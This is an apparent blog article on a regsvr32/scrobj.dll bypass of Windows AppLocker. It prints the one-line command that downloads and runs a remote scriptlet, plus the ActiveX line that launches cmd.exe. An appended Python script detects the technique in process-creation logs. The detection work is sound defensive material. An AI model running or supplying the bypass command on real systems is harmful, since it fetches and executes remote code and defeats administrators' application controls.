Bypass Windows AppLocker

If you use Microsoft AppLocker to lock Windows computers in your office or school, then we have bad news for you.

A security researcher has discovered a way to bypass this piece of Windows software and run arbitrary applications.

AppLocker allows IT administrators to manage large networks. They can determine which programs and which scripts can be run by users.

The service first shipped with Windows 7. Its goal was to stop non-work-related programs from starting, or to stop end users from running programs used by the company or organization's support department.

Security researcher Casey Smith has discovered a way to bypass AppLocker. The bypass is very simple and fits in a single line, the command shown below.

regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll

Running the above command tells Windows to download an XML file from the Internet, and that file instructs the system to run cmd.exe.

The magic here is that if you replace cmd.exe with any program that AppLocker blocks, that program will start.

"It is not well-documented that Regsvr32.exe cannot accept a URL for a script," Smith said.
In the above case, the JavaScript embedded in the XML file uses ActiveX:

var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");

It is a case of chaining together various components in the labyrinth of code that Microsoft's Windows uses. All JavaScript, Basic and PowerShell scripts can be run from the internet, or from a local file, via regsvr32, according to Smith.

So even if you are logged on to the PC as a standard user or guest, you can use the hack to bypass AppLocker.
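For defenders, the command described above leaves a recognisable process-creation record: regsvr32 loading scrobj.dll with an /i: argument that points at a script. The following is an added detection example, not part of the original article or of Smith's work. It assumes command lines exported from process-creation logging (for example Windows Security event 4688 or Sysmon event 1); the sample records, user names and the scriptlet.example host are constructed.

```python
import re

# regsvr32 accepts "/" or "-" as the switch prefix; /i: carries the script location.
_REGSVR32 = re.compile(r'(?:^|[\\/"\s])regsvr32(?:\.exe)?(?=["\s]|$)', re.IGNORECASE)
_SCROBJ = re.compile(r'scrobj(?:\.dll)?(?=["\s]|$)', re.IGNORECASE)
_I_SWITCH = re.compile(r'(?:^|[\s"])[/-]i:\s*"?([^"\s]+)', re.IGNORECASE)
_URL = re.compile(r'^https?://', re.IGNORECASE)


def classify(cmdline):
    """Return 'remote-scriptlet', 'local-scriptlet' or None for one command line."""
    if not _REGSVR32.search(cmdline) or not _SCROBJ.search(cmdline):
        return None  # not regsvr32, or not the script component DLL
    m = _I_SWITCH.search(cmdline)
    if not m:
        return None  # scrobj.dll handled without a script argument
    return "remote-scriptlet" if _URL.match(m.group(1)) else "local-scriptlet"


def scan(events):
    """Return (user, verdict, cmdline) for every record that matches."""
    hits = []
    for user, cmdline in events:
        verdict = classify(cmdline)
        if verdict:
            hits.append((user, verdict, cmdline))
    return hits


# Constructed sample of process-creation records: (user, command line).
EVENTS = [
    ("alice", r'regsvr32 /s /n /u /i:http://scriptlet.example/a.sct scrobj.dll'),
    ("bob", r'"C:\Windows\SysWOW64\regsvr32.exe" -s -n -u -i:"C:\Users\bob\a.sct" SCROBJ.DLL'),
    ("carol", r'C:\Windows\System32\regsvr32.exe /s "C:\Program Files\App\plugin.dll"'),
    ("dave", r'regsvr32.exe /s scrobj.dll'),
]

if __name__ == "__main__":
    for user, verdict, cmdline in scan(EVENTS):
        print(f"{verdict:17} {user:6} {cmdline}")
```

The two verdicts correspond to the two sources the article names, the internet and a local file; ordinary DLL registrations such as the third and fourth records are not flagged.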

PoC's


Written by giorgos
